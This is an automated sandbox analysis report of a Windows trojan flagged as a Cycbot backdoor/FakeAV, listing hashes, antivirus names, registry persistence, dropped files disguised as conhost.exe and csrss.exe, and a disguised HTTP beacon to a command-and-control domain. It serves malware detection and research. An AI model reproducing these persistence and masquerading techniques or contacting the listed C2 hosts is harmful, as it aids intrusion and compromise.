Analysis Date: 2014-06-15 12:57:26
MD5: bb097b031e7c512aaa51640243777131
SHA1: 0016434bd74949f750b54b11a434aa391f96b732

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text: md5: 7ee4a0d2cbd4371b99fc364f6c084ed6 sha1: 4dcf5b933241ae223cbc05cac81a36a71d8ebd5f size: 184832
Section .rdata: md5: c96e146b0cbc15a70a592d84f30b0143 sha1: 8efb8ce9674ab61d656c02511f70fb458b961bcb size: 2048
Section .data: md5: 280702121e227615664c1e75dbf619f0 sha1: 2a0f71844a8395116a5724c38afb70ccee2fd2e6 size: 19968
Section .lib: md5: b5e79b6c246ee87c3d9b3eccfa5ec120 sha1: aad1342006de9a094409b394d99c17e2f10d3d6e size: 512
Timestamp: 2005-11-25 01:03:13
Version: PrivateBuild: 1562
PEhash: 2d28eee76ef44393ea296cb57382b401fd8d1778
IMPhash: ad01fc5ce8d32741e683261793d7c4d5
AV 360 Safe: Trojan.Generic.KD.132323
AV Ad-Aware: Trojan.Generic.KD.132323
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.E.gen!Eldorado
AV Avira (antivir): TR/Kazy.12051.psa
AV CA (E-Trust Ino): Win32/Diple.A!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.132323
AV Dr. Web: Trojan.DownLoader2.62290
AV Emsisoft: Trojan.Generic.KD.132323
AV Eset (nod32): Win32/Kryptik.KQK
AV Fortinet: W32/Katusha.O!tr
AV Frisk (f-prot): W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Trojan.Generic.KD.132323
AV Grisoft (avg): Generic_r.FN
AV Ikarus: Backdoor.Win32.Cycbot
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.h
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Trojan.Generic.KD.132323
AV Norman: winpe/FakeAV.ACWY
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IS
AV Symantec: Trojan.Gen.2
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: dlsystemone.com
Winsock DNS: 127.0.0.1
Winsock DNS: iphonefirmware.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: iphonefirmware.com
Type: A
173.248.187.249
DNS: dlsystemone.com
Type: A
HTTP GET: http://iphonefirmware.com/wp-content/uploads/2010/06/wifiicon.jpg?tq=gP4aKydWBRdzxqTNy1F8PktrTgcvT%2BpXvvNFU2O8Ffb5cv3HLXaOosVspc0GrZog6amsMDKgOhALkbkpqmo1B32%2BH%2BX9lRUmPmb9HGkrj%2BTRRYhcYK3agsaM1vN8INzQ381gOnjFNeeyrN1IcrOkQzI88Yeqc1PH5C78nORVTpnX7hpU%2Bx28W0H2jgSwqwuzdi36dj0E9I3oJ%2BFpGE3K8Xgjyuw15oY7rDvB1OV5ThWMbLRu9MZ1JFbrxsBiREXHsNt6538dedMr7wUMqxkmFkA1pBNe6syAon3NwHwYlkguwVYqWcfE5dWqiVcS9IwOl7Vhik7Rwfb9CijxHzT4sZnxiQ2lhAaYtwReY3jwI0F%2F6%2F%2BIHgIpm%2B5zzajAv94HHuytZpxf0NmdfVxZeJGAw1VYcbqLtlSC8d%2F2tgtD8QG%2F6KDJSYVlRnDHm7UtlhvySmBgdGfHpntLRH%2BCtz8%2FR7LoXipPfaY%2FTvAUwCPQC5isv1os2EE25Y0k54xYi2WQHhD6u7EJPuu
User-Agent: opera/8.11
Flows TCP: 192.168.1.1:1031 ➝ 173.248.187.249:80

Raw Pcap

Strings
040904b0
1562
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
ADVAPI32.dll
AreFileApisANSI
BeginUpdateResourceW
CharNextA
CharNextW
CommandLineToArgvW
CopyFileA
CopyFileW
CreateDirectoryA
CreateDirectoryW
CreateFiberEx
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptReleaseContext
@.data
DebugBreak
DeleteFileA
DeleteFileW
EndUpdateResourceW
EnumResourceNamesW
EscapeCommFunction
FatalExit
FindClose
FreeLibrary
GetFileAttributesA
GetFileAttributesW
GetFileInformationByHandle
GetFullPathNameA
GetFullPathNameW
GetOEMCP
GetProcessMemoryInfo
ICInfo
ImageDirectoryEntryToData
ImageGetDigestStream
imagehlp.dll
ImageNtHeader
ImageRvaToVa
KERNEL32.dll
LoadLibraryExA
LoadLibraryExW
lstrlenA
MonitorFromWindow
MSVFW32.dll
OutputDebugStringA
PSAPI.DLL
`.rdata
ReadFile
RemoveDirectoryA
RemoveDirectoryW
SetFileAttributesA
SetFileAttributesW
SHELL32.dll
!This program cannot be run in DOS mode.
UpdateResourceW
USER32.dll
wsprintfW